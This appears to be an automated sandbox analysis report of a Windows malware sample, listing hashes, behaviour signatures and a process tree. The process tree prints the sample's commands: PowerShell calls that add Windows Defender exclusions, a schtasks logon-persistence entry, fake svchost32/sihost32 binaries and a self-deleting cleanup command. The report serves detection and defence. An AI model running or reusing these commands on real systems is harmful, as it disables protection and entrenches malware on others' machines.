Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/11/2024, 05:00
Static task
static1
Behavioral task
behavioral1
Sample
89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
Resource
win7-20241010-en
General
-
Target
89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
-
Size
1.9MB
-
MD5
89bf9535900487968f2c9282bc739f78
-
SHA1
1640394a37b36fb937e743599932155a32a9f737
-
SHA256
5f87e339571e6fad52ee59bb9f47bcea7a929187153fe73e2c6bf6f686c346be
-
SHA512
48c5dfe6c34dd81a9c987030264255dccbcfc895bd5b80a2dfde94b68be0721787e2fec3ceef857f2951b4c37ac20c8b6e0a92bc57aaf8ee550be3ceaf662472
-
SSDEEP
49152:J4fnmf79D0vIST10ybAe/BSWpU1cQX0uDHD8bPiz8Em:JamfOR82pnC9ffY5
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3212 powershell.exe 4484 powershell.exe 3624 powershell.exe 1056 powershell.exe 3108 powershell.exe 532 powershell.exe 3576 powershell.exe 392 powershell.exe 4612 powershell.exe 2988 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mbuilder.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost32.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mbuilder.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost32.exe -
Executes dropped EXE 5 IoCs
pid Process 1236 mbuilder.exe 3652 svchost32.exe 2872 mbuilder.exe 1236 svchost32.exe 4860 sihost32.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\mbuilder.exe svchost32.exe File opened for modification C:\Windows\system32\mbuilder.exe svchost32.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\mbuilder.exe 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2540 schtasks.exe 3116 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3576 powershell.exe 532 powershell.exe 3576 powershell.exe 532 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe 3212 powershell.exe 3212 powershell.exe 3212 powershell.exe 4484 powershell.exe 4484 powershell.exe 3624 powershell.exe 3624 powershell.exe 3652 svchost32.exe 3108 powershell.exe 3108 powershell.exe 4612 powershell.exe 4612 powershell.exe 2988 powershell.exe 2988 powershell.exe 1236 svchost32.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 3652 svchost32.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeDebugPrivilege 1236 svchost32.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 2576 wrote to memory of 3684 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 92 PID 2576 wrote to memory of 3684 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 92 PID 2576 wrote to memory of 3684 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 92 PID 2576 wrote to memory of 2032 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 94 PID 2576 wrote to memory of 2032 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 94 PID 2576 wrote to memory of 2032 2576 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 94 PID 3684 wrote to memory of 532 3684 cmd.exe 97 PID 3684 wrote to memory of 532 3684 cmd.exe 97 PID 3684 wrote to memory of 532 3684 cmd.exe 97 PID 2032 wrote to memory of 1236 2032 cmd.exe 96 PID 2032 wrote to memory of 1236 2032 cmd.exe 96 PID 1236 wrote to memory of 4284 1236 mbuilder.exe 98 PID 1236 wrote to memory of 4284 1236 mbuilder.exe 98 PID 4284 wrote to memory of 3576 4284 cmd.exe 100 PID 4284 wrote to memory of 3576 4284 cmd.exe 100 PID 4284 wrote to memory of 392 4284 cmd.exe 102 PID 4284 wrote to memory of 392 4284 cmd.exe 102 PID 4284 wrote to memory of 3212 4284 cmd.exe 103 PID 4284 wrote to memory of 3212 4284 cmd.exe 103 PID 4284 wrote to memory of 4484 4284 cmd.exe 104 PID 4284 wrote to memory of 4484 4284 cmd.exe 104 PID 3684 wrote to memory of 3624 3684 cmd.exe 107 PID 3684 wrote to memory of 3624 3684 cmd.exe 107 PID 3684 wrote to memory of 3624 3684 cmd.exe 107 PID 1236 wrote to memory of 4496 1236 mbuilder.exe 108 PID 1236 wrote to memory of 4496 1236 mbuilder.exe 108 PID 4496 wrote to memory of 3652 4496 cmd.exe 110 PID 4496 wrote to memory of 3652 4496 cmd.exe 110 PID 3652 wrote to memory of 2372 3652 svchost32.exe 111 PID 3652 wrote to memory of 2372 3652 svchost32.exe 111 PID 2372 wrote to memory of 2540 2372 cmd.exe 113 PID 2372 wrote to memory of 2540 2372 cmd.exe 113 PID 3652 wrote to memory of 2872 3652 svchost32.exe 114 PID 3652 wrote to memory of 2872 3652 svchost32.exe 114 PID 3652 wrote to memory of 1224 3652 svchost32.exe 115 PID 3652 wrote to memory of 1224 3652 svchost32.exe 115 PID 2872 wrote to memory of 2788 2872 mbuilder.exe 116 PID 2872 wrote to memory of 2788 2872 mbuilder.exe 116 PID 2788 wrote to memory of 1056 2788 cmd.exe 119 PID 2788 wrote to memory of 1056 2788 cmd.exe 119 PID 1224 wrote to memory of 1892 1224 cmd.exe 120 PID 1224 wrote to memory of 1892 1224 cmd.exe 120 PID 2788 wrote to memory of 3108 2788 cmd.exe 121 PID 2788 wrote to memory of 3108 2788 cmd.exe 121 PID 2788 wrote to memory of 4612 2788 cmd.exe 122 PID 2788 wrote to memory of 4612 2788 cmd.exe 122 PID 2788 wrote to memory of 2988 2788 cmd.exe 124 PID 2788 wrote to memory of 2988 2788 cmd.exe 124 PID 2872 wrote to memory of 2036 2872 mbuilder.exe 127 PID 2872 wrote to memory of 2036 2872 mbuilder.exe 127 PID 2036 wrote to memory of 1236 2036 cmd.exe 129 PID 2036 wrote to memory of 1236 2036 cmd.exe 129 PID 1236 wrote to memory of 3752 1236 svchost32.exe 130 PID 1236 wrote to memory of 3752 1236 svchost32.exe 130 PID 1236 wrote to memory of 4860 1236 svchost32.exe 132 PID 1236 wrote to memory of 4860 1236 svchost32.exe 132 PID 3752 wrote to memory of 3116 3752 cmd.exe 133 PID 3752 wrote to memory of 3116 3752 cmd.exe 133 PID 1236 wrote to memory of 972 1236 svchost32.exe 134 PID 1236 wrote to memory of 972 1236 svchost32.exe 134 PID 972 wrote to memory of 640 972 cmd.exe 136 PID 972 wrote to memory of 640 972 cmd.exe 136 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\mbuilder.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\mbuilder.exeC:\Windows\mbuilder.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
-
C:\Windows\system32\mbuilder.exe"C:\Windows\system32\mbuilder.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
- Command and Scripting Interpreter: PowerShell
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit9⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'10⤵
- Scheduled Task/Job: Scheduled Task
PID:3116
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"9⤵
- Executes dropped EXE
PID:4860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"9⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:640
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:1892
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD528d7fcc2b910da5e67ebb99451a5f598
SHA1a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA2562391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA5122d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5a9eefee1cdccd47459b474fa81f53ef6
SHA1c719b583efed694615235819161879cc36a45aff
SHA256c99bc609a9b7674042b44889a0b498556f1c3fb45125d6452a4e983fdeaa3982
SHA512d76c1bcb6f79fcccefe887a663333e2f9b4d2affaa12a381bda408593938148ad64d74b22ea94ffe3e70cc61b44f9a4d6d82a73bfe8f2871bd20c5a3bb2ed2ea
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
944B
MD507a771c4f31f62b2d04e2befaa36dce7
SHA1662952ede6c1acbb575e8149a5ac2f08edade811
SHA256a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3
SHA5129e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9
-
Filesize
944B
MD5e5663972c1caaba7088048911c758bf3
SHA13462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA2569f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
944B
MD5dbb22d95851b93abf2afe8fb96a8e544
SHA1920ec5fdb323537bcf78f7e29a4fc274e657f7a4
SHA256e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465
SHA51216031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.9MB
MD50a36dbea88311baeb376ff6fb3ea0a3a
SHA1100d0b18060351080e63c3e920017056bc6ad9ee
SHA256a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b
SHA512ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8
-
Filesize
8KB
MD5ecd7d7be630be740725bb52e73dafec0
SHA17def3f5a97ffbd07ad81357262b0c0b49859276d
SHA25676b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706
SHA512412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45
-
Filesize
1.9MB
MD50febccd878b78d6a42ea449dd2f8bca9
SHA17edd6245882138e3b5211ff9ea98d59e3cf5371a
SHA256a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11
SHA51200949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523